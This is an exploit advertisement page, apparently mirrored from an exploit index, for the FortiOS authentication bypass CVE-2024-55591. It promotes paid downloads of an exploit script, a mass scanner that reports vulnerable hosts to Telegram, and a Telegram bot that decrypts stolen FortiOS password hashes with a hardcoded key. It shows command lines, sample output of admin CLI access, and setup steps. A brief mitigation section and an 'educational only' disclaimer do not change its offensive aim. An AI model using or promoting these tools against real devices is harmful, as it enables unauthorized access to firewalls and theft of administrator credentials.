Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy CVE-2024-55591

Name: Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy CVE-2024-55591
Rating: 5 (156 reviews)
2025-04-11 | CVSS 9.8
## https://sploitus.com/exploit?id=C7FC81AA-D234-5788-B9DF-9C46E9B682F2
# CVE-2024-55591: FortiOS Authentication Bypass  

**If you’re reading this, you most likely know what we’re talking about.**
**Nevertheless, for academic purposes only, I bring to your attention the following information.
UPD. Also updated the SEARCHER IP. Now it's more efficient, and it gets around a lot of difficulties.**

![CVE](https://img.shields.io/badge/CVE-2024--55591-critical)  
![Python](https://img.shields.io/badge/Python-3.8%2B-blue)  
![License](https://img.shields.io/badge/License-MIT-green)  



---
# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT!!!

---
# Detection in Action

```
python3 exp.py --host 192.104.119.11 --port 443 --command "show user local" --ssl



                      ██████╗ ██╗███╗   ██╗ █████╗ ██████╗ ██╗   ██╗    ██╗    ██╗ █████╗ ██████╗ ███╗   ███╗
                      ██╔══██╗██║████╗  ██║██╔══██╗██╔══██╗╚██╗ ██╔╝    ██║    ██║██╔══██╗██╔══██╗████╗ ████║
                      ██████╔╝██║██╔██╗ ██║███████║██████╔╝ ╚████╔╝     ██║ █╗ ██║███████║██████╔╝██╔████╔██║
                      ██╔══██╗██║██║╚██╗██║██╔══██║██╔══██╗  ╚██╔╝      ██║███╗██║██╔══██║██╔══██╗██║╚██╔╝██║
                      ██████╔╝██║██║ ╚████║██║  ██║██║  ██║   ██║       ╚███╔███╔╝██║  ██║██║  ██║██║ ╚═╝ ██║
                      ╚═════╝ ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝        ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝
                          



            exp.py
            (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC 
        
            CVEs: [CVE-2024-55591]

            [*] Checking if target is a FortiOS Management interface
            [*] Target is confirmed as a FortiOS Management interface
            [*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
            Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

            Output from server: �
            get system status

            Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
            Unknown action 0

            FAKESERIAL # 
            FAKESERIAL # get system status
            Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
            Security Level: High
            Firmware Signature: certified
            Virus-DB: 1.00000(2018-04-09 18:07)
```
---

#  Description  
A critical authentication bypass vulnerability in FortiOS (versions 7.4.0-7.4.2 and 7.2.0-7.2.6) allows unauthorized administrative access through WebSocket protocol manipulation. This repository contains two tools:
1. **Exploit (exp.py)** - Proof-of-Concept for vulnerability exploitation
2. **Scanner (scanner-cve2024-55591.py)** - Mass detection tool with Telegram notifications

---

#  Technical Details  
**Vulnerability Type**: Session Hijacking via WebSocket Negotiation  
**Attack Vector**:  
- WebSocket handshake manipulation with forged headers  
- Invalid session token acceptance  
- Privileged CLI command execution

#  Pentest Environment Setup in `scrypt` Directory

## 1. Initial Server Configuration

### Update system and install core tools
```
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y git python3.10-venv python3-pip python3-dev build-essential libssl-dev libffi-dev ca-certificates
```
**Affected Components**:  
- `/ws/cli/open` WebSocket endpoint  
- Service Worker API (`/service-worker.js`)

## 2. Install base dependencies
```
sudo apt install -y python3 python3-venv python3-pip git
```
## 3. Create project directory and navigate to it
```
mkdir /scrypt && cd /scrypt
```
## 4. Create Python virtual environment named "pentest"
```
python3 -m venv pentest
```
## 5.  Activate virtual environment
```
source pentest/bin/activate
```
## 6. Install required Python packages
```
pip install requests urllib3 python-telegram-bot
```
## 7. Move the files exp.py, scanner.py, and targets.txt to the /scrypt directory
---

# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT


---
# Vulnerability searching

 ## Description
 The script scanner-cve2024-55591.py scans a list of Fortinet addresses (listed line-by-line in a text file) for the reported vulnerability 
 and sends positive detection results to your Telegram bot.
 
 ## Start scanner
 ```
 python3 scanner-cve2024-55591.py --file targets.txt --port 443
```
Here we go!

![scanner-execution](https://github.com/user-attachments/assets/48000329-f75f-45ea-b7dd-782bcd268872)

 - The banner displays vulnerability details (CVE-2024-55591).

 - Scanning progress for IPs from targets.txt


## Scan Results
   
![scan-results-log](https://github.com/user-attachments/assets/57430454-9ce7-4e30-9867-fb5151472cad)

Vulnerable targets detected!

---
# Exploitation
 ## Run the scrypt:
 
```
python3 exp.py --host <TARGET_IP> --port 443 --command "show user local" --ssl

```

![exp-execution](https://github.com/user-attachments/assets/80e0bf78-2ad2-4b93-a9f8-16c941575583)

Script performs pre-flight checks:

 - Confirms the target is a FortiOS management interface

 - Verifies vulnerability to CVE-2024-55591

 ## Credentials Extraction

Extracted User Credentials
  
![exp-getting-info](https://github.com/user-attachments/assets/6b978b6e-4615-4a86-a02c-9bf4377ac199)

Here we go!
---

# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT

---
# Decrypting FortiOS encrypted credentials

##  Purpose

- Decrypts FortiOS passwords hashes (ENC-format) extracted via CVE-2024-55591  
- Uses AES-128-CBC with static IV (for demonstration - **not secure for production!**)  
- Designed for educational analysis of compromised credentials

## How It Works

1. **Receives ENC hash** via Telegram message  
2. **Decryption Process**:  
   - Base64 decoding  
   - IV extraction (first 4 bytes + 12 null bytes padding)  
   - AES-128-CBC decryption with hardcoded key `b'Mary had a littl'`  
3. **Returns** cleartext password stripped of null-bytes

## Quick Start

1. Install dependencies:


   ```
   pip install aiogram pycryptodome
   ```

2. Create config file (bot.json):

```
{
  "bot_token": "YOUR_TELEGRAM_BOT_TOKEN"
}
```
3. Run bot:

```
python decryptorbot.py
```

4. Send ENC hash to your bot

![telegram-decrypt](https://github.com/user-attachments/assets/046e1013-10db-4138-b170-8fcb77f52886)


---

# Important Notes

 - Educational use only - real decryption requires proper key management

 - Default key is insecure - replace with environment variables in production

 - Never use for unauthorized credential decryption

 - Full security advisory: Fortinet PSIRT

---
# Affected Versions

FortiOS Version	Status
7.4.0 - 7.4.2	Vulnerable
7.2.0 - 7.2.6	Vulnerable
7.4.3+	Patched
7.2.7+	Patched
--- 

# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT

---

# Mitigation 

## Immediate Action:

 - Upgrade to FortiOS 7.4.3 or 7.2.7.

## Temporary Workaround:


### Block unauthorized header modifications at the WAF/load balancer  

```
config firewall policy  
    set name "Block_XFF_Spoofing"  
    set srcintf "any"  
    set dstintf "any"  
    set action deny  
    set match "X-Forwarded-For"
```
### Audit Logs: Monitor /var/log/sslvpn.log for suspicious admin access attempts

---

# References

 - Fortinet Advisory

 - NVD Entry

---

# Legal Disclaimer

This repository is for educational purposes only. Usage of this tool or PoC for unauthorized testing is strictly prohibited. The author assumes no liability for misuse.

---
# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT